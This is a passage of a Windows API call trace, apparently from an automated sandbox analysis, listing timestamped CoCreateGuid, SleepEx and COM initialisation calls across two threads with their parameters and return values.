pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x4cd4e84a, Data2=0x5d79, Data3=0x48b1, Data4=([0]=0x99, [1]=0x75, [2]=0x79, [3]=0x1d, [4]=0x9c, [5]=0x9e, [6]=0x69, [7]=0xe5))) returned 0x0 [0146.774] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x553bb5b9, Data2=0xea38, Data3=0x4478, Data4=([0]=0xbe, [1]=0x15, [2]=0xba, [3]=0x23, [4]=0xe4, [5]=0xa2, [6]=0x14, [7]=0xa7))) returned 0x0 [0146.775] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x2bf75d8b, Data2=0xb614, Data3=0x4cc7, Data4=([0]=0xba, [1]=0x99, [2]=0x3a, [3]=0x74, [4]=0xd6, [5]=0xdc, [6]=0x60, [7]=0xad))) returned 0x0 [0146.777] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x16be9165, Data2=0x2d7, Data3=0x4d7c, Data4=([0]=0xb3, [1]=0x21, [2]=0xed, [3]=0xcd, [4]=0x1f, [5]=0x96, [6]=0xc, [7]=0x4a))) returned 0x0 [0146.778] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xbc6406a5, Data2=0x4a22, Data3=0x43fd, Data4=([0]=0xa4, [1]=0xc3, [2]=0x70, [3]=0xd2, [4]=0xaa, [5]=0x86, [6]=0x25, [7]=0x7))) returned 0x0 [0146.779] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xa5072d6d, Data2=0xa269, Data3=0x46a1, Data4=([0]=0xbc, [1]=0x5f, [2]=0xcd, [3]=0xd3, [4]=0x9e, [5]=0xd8, [6]=0x5a, [7]=0x4e))) returned 0x0 [0146.780] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xf1d59be2, Data2=0xc, Data3=0x41b5, Data4=([0]=0xa1, [1]=0xb7, [2]=0x8a, [3]=0xc0, [4]=0x96, [5]=0x71, [6]=0x3e, [7]=0x1b))) returned 0x0 [0146.781] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xc6a06df, Data2=0x3807, Data3=0x4552, Data4=([0]=0xa0, [1]=0x6, [2]=0x59, [3]=0x3, [4]=0x10, [5]=0x61, [6]=0x15, [7]=0x2d))) returned 0x0 [0146.783] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xe75ba789, Data2=0xca64, Data3=0x43c5, Data4=([0]=0xb2, [1]=0x21, [2]=0xaa, [3]=0x25, [4]=0xdd, [5]=0x57, [6]=0xc6, [7]=0x90))) returned 0x0 [0146.786] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xd520ad9a, Data2=0xc23a, Data3=0x4d05, Data4=([0]=0xb0, [1]=0x6, [2]=0x33, [3]=0xd1, [4]=0x4c, [5]=0xbc, [6]=0x80, [7]=0xff))) returned 0x0 [0146.788] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xffdf853c, Data2=0xfd07, Data3=0x4ffe, Data4=([0]=0xbb, [1]=0xbd, [2]=0x2, [3]=0xbf, [4]=0x9b, [5]=0xc2, [6]=0xef, [7]=0x80))) returned 0x0 [0146.788] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x49be5e23, Data2=0x9b8b, Data3=0x45ad, Data4=([0]=0xa4, [1]=0xe8, [2]=0xfa, [3]=0x93, [4]=0xda, [5]=0x89, [6]=0x23, [7]=0x98))) returned 0x0 [0146.790] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xceec906d, Data2=0xc8cb, Data3=0x4d5d, Data4=([0]=0x9e, [1]=0x22, [2]=0xb6, [3]=0x2c, [4]=0x82, [5]=0x13, [6]=0xbe, [7]=0x85))) returned 0x0 [0146.792] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x5573e5c6, Data2=0x6300, Data3=0x478e, Data4=([0]=0xa2, [1]=0x3f, [2]=0x10, [3]=0xe7, [4]=0x40, [5]=0x91, [6]=0xfe, [7]=0x64))) returned 0x0 [0146.793] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x7bef22e2, Data2=0xdf96, Data3=0x467f, Data4=([0]=0xa2, [1]=0x10, [2]=0x92, [3]=0x43, [4]=0x22, [5]=0xa9, [6]=0x26, [7]=0xae))) returned 0x0 [0146.794] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x48a1654d, Data2=0x3111, Data3=0x4908, Data4=([0]=0xb6, [1]=0xac, [2]=0xee, [3]=0x6e, [4]=0xa7, [5]=0x67, [6]=0x17, [7]=0x70))) returned 0x0 [0146.795] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x68eb800c, Data2=0x9270, Data3=0x4d33, Data4=([0]=0x8a, [1]=0x56, [2]=0xc9, [3]=0xf8, [4]=0xe6, [5]=0x45, [6]=0x2e, [7]=0x7e))) returned 0x0 [0146.795] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x483a6dff, Data2=0x83d5, Data3=0x4417, Data4=([0]=0xbb, [1]=0x6b, [2]=0x2b, [3]=0xa1, [4]=0x9b, [5]=0x4e, [6]=0xda, [7]=0x17))) returned 0x0 [0146.795] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x66192934, Data2=0x19da, Data3=0x47bc, Data4=([0]=0x93, [1]=0x63, [2]=0xd6, [3]=0x10, [4]=0x9e, [5]=0xb5, [6]=0x7f, [7]=0x26))) returned 0x0 [0146.889] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x547356d, Data2=0xb8ce, Data3=0x4c2c, Data4=([0]=0x8b, [1]=0xd2, [2]=0x75, [3]=0xb6, [4]=0x3e, [5]=0xe0, [6]=0xdf, [7]=0xeb))) returned 0x0 [0146.890] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x38ac8d66, Data2=0xfe23, Data3=0x4249, Data4=([0]=0xbe, [1]=0x9, [2]=0x1d, [3]=0x9a, [4]=0x16, [5]=0x57, [6]=0x4f, [7]=0xf6))) returned 0x0 [0146.890] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x97c5c59, Data2=0xd366, Data3=0x4321, Data4=([0]=0x96, [1]=0xd1, [2]=0x55, [3]=0xd8, [4]=0x8c, [5]=0x67, [6]=0x6c, [7]=0xe3))) returned 0x0 [0146.891] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xfa888214, Data2=0xb051, Data3=0x45f7, Data4=([0]=0x97, [1]=0xf8, [2]=0x9f, [3]=0x88, [4]=0xbe, [5]=0x0, [6]=0xbf, [7]=0xfd))) returned 0x0 [0146.892] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x92859346, Data2=0xfcb0, Data3=0x4082, Data4=([0]=0xa9, [1]=0x42, [2]=0xff, [3]=0x66, [4]=0xf9, [5]=0xb8, [6]=0xba, [7]=0x2e))) returned 0x0 [0146.893] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x435dfc7e, Data2=0xbcbd, Data3=0x446a, Data4=([0]=0x9b, [1]=0xf0, [2]=0x3, [3]=0xe2, [4]=0x3e, [5]=0x1a, [6]=0xf8, [7]=0x24))) returned 0x0 [0146.894] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x84aa13c6, Data2=0xfb02, Data3=0x4f64, Data4=([0]=0xa7, [1]=0x58, [2]=0xfb, [3]=0x43, [4]=0xf9, [5]=0xc8, [6]=0xae, [7]=0xa4))) returned 0x0 [0146.898] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0147.018] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0147.126] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0147.375] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0147.551] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0147.647] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0147.776] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0147.912] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0148.074] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0148.534] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0148.654] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0148.863] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0149.004] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0149.143] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0149.560] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0149.693] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0149.763] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0149.834] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0149.909] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0149.999] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0150.083] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0150.202] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0150.496] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0150.627] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0150.731] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.477] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.731] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.853] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.050] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.157] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.233] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.342] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.426] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.505] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.663] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.720] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.779] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.840] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.933] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.996] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.090] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.184] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.277] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.371] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.465] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.606] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.715] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.809] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.902] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.980] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.683] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.708] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.762] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.802] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.859] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.909] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.957] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0169.026] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0169.065] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0169.113] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0169.235] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0169.291] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0169.358] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0169.422] QueryUnbiasedInterruptTime (in: UnbiasedTime=0x755f878 | out: UnbiasedTime=0x755f878) returned 1 [0169.430] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0169.564] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0169.642] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0169.753] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0169.797] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0169.862] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0169.954] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0170.016] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0170.046] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0170.082] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0170.129] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0170.249] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0170.305] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0170.352] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0170.439] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0170.503] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0170.560] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0170.607] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0170.630] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0170.703] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0170.780] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0170.844] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0170.886] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0171.019] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0171.070] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0172.867] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0172.923] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0172.976] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.003] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.058] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.120] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.190] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.367] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.414] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.482] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.523] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.615] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.700] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.769] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.819] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.830] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.844] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.881] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0173.944] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0174.007] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0174.058] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0174.118] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0174.205] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0174.421] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0174.556] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0174.601] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0174.647] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0174.707] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0174.756] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0174.781] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0174.832] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0174.881] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0174.928] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0174.975] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.069] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.115] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.189] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.289] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.351] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.413] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.439] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.446] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.464] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.467] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.491] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.494] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.500] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.527] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.632] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.690] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.711] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.716] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.724] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.744] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.752] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.754] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.766] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.773] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.777] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.789] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.839] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.852] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.857] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.911] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.920] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.925] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.992] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0176.053] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0176.082] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0176.171] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0176.192] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0176.197] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0176.222] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0176.368] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0176.401] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0176.451] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0176.455] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0176.460] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0176.477] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0176.487] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0176.494] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0176.499] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0176.502] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0176.517] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0176.520] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0176.535] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0176.538] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 Thread: id = 83 os_tid = 0xe6c [0130.421] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0130.422] CoGetContextToken (in: pToken=0x75df744 | out: pToken=0x75df744) returned 0x0 [0130.422] CObjectContext::QueryInterface () returned 0x0 [0130.422] CObjectContext::GetCurrentThreadType () returned 0x0 [0130.422] Release () returned 0x0 [0130.422] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0130.422] CoUninitialize () [0130.422] RoInitialize () returned 0x1 [0130.422] RoUninitialize () returned 0x0 [0130.423] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0130.570] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0130.687] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0130.945] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0131.157] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0131.389] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0131.598] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0131.926] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0132.078] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0132.262] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0132.713] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0132.884] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0133.163] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0133.897] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.037] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.209] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.339] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0142.653] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0143.015] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0143.309] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0143.445] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0143.669] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0143.830] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0143.948] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0144.038] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0144.310] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0144.556] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0144.701] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0144.931] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.105] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.164] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.445] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.589] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.735] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.783] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.951] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0146.074] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0146.173] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0146.414] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0146.520] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0146.675] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0146.832] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.475] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.730] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.853] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.048] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.156] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.233] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.342] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.426] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.504] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.663] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.720] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.779] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.840] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.932] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.995] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0161.152] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0161.202] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0161.331] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0161.368] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0161.430] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0161.483] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0161.634] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0161.681] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0161.741] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0161.772] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0161.807] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0161.851] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0161.873] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0161.921] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0161.941] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0161.994] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0162.040] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0162.097] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0162.118] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0162.149] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0162.171] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0162.183] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0162.228] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0162.273] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0162.332] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.683] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.708] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.762] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.802] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.859] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.909] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.958] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0169.026] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0169.065] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0169.113] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0169.236] 